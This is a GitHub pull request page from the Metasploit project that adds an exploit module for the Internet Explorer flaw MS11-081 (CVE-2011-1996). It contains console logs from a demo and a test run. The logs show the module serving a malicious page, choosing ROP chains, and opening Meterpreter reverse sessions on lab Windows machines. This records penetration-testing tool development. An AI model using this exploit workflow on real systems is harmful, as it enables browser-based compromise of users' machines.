Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add MS11-081 #1279

Merged
merged 1 commit into from Jan 9, 2013
Merged

Add MS11-081 #1279

merged 1 commit into from Jan 9, 2013

Conversation

wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Jan 9, 2013

Ivan Fratric's CVE-2011-1996. Demo:

msf  exploit(ms11_081_option) > [*] Server started.
[*] 10.6.255.98      ms11_081_option - Requesting: /Y0NO4UEM
[*] 10.6.255.98      ms11_081_option - Target selected as: IE 8 on Windows 7
[*] 10.6.255.98      ms11_081_option - Using JRE ROP
[*] 10.6.255.98      ms11_081_option - Sending HTML...
[*] Sending stage (752128 bytes) to 10.6.255.98
[*] Meterpreter session 2 opened (10.6.255.89:4444 -> 10.6.255.98:49281) at 2013-01-09 16:04:18 -0600
[*] Session ID 2 (10.6.255.89:4444 -> 10.6.255.98:49281) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2940)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1692
[+] Successfully migrated to process 

msf  exploit(ms11_081_option) >

@jvazquez-r7
Copy link
Contributor

Tested was successfull:

msf > use exploit/windows/browser/ms11_081_option 
msf  exploit(ms11_081_option) > rexploit
[*] Reloading module...
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.128:4444 
[*] Using URL: http://0.0.0.0:8080/AzP3lQnX4US6Ru
[*]  Local IP: http://192.168.1.128:8080/AzP3lQnX4US6Ru
[*] Server started.
msf  exploit(ms11_081_option) > [*] 192.168.1.142    ms11_081_option - Requesting: /AzP3lQnX4US6Ru
[*] 192.168.1.142    ms11_081_option - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.1.142    ms11_081_option - Using msvcrt ROP
[*] 192.168.1.142    ms11_081_option - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.142
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.142:4075) at 2013-01-09 23:25:30 +0100
[*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.142:4075) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3584)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2236
[+] Successfully migrated to process 
[*] 192.168.1.142 - Meterpreter session 1 closed.  Reason: Died
[*] 192.168.1.137    ms11_081_option - Requesting: /AzP3lQnX4US6Ru
[*] 192.168.1.137    ms11_081_option - Target selected as: IE 8 on Windows 7
[*] 192.168.1.137    ms11_081_option - Using JRE ROP
[*] 192.168.1.137    ms11_081_option - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.137
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.137:49574) at 2013-01-09 23:27:24 +0100
[*] Session ID 2 (192.168.1.128:4444 -> 192.168.1.137:49574) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2796)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2816
[+] Successfully migrated to process 
[*] 192.168.1.137 - Meterpreter session 2 closed.  Reason: Died
[*] 192.168.1.131    ms11_081_option - Requesting: /AzP3lQnX4US6Ru
[*] 192.168.1.131    ms11_081_option - Target selected as: IE 8 on Windows Vista
[*] 192.168.1.131    ms11_081_option - Using JRE ROP
[*] 192.168.1.131    ms11_081_option - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.131
[*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.131:49393) at 2013-01-09 23:28:42 +0100
[*] Session ID 3 (192.168.1.128:4444 -> 192.168.1.131:49393) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3632)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 336
[+] Successfully migrated to process 
[*] 192.168.1.131 - Meterpreter session 3 closed.  Reason: Died

merging!

@jvazquez-r7 jvazquez-r7 merged commit f3b88d3 into rapid7:master Jan 9, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants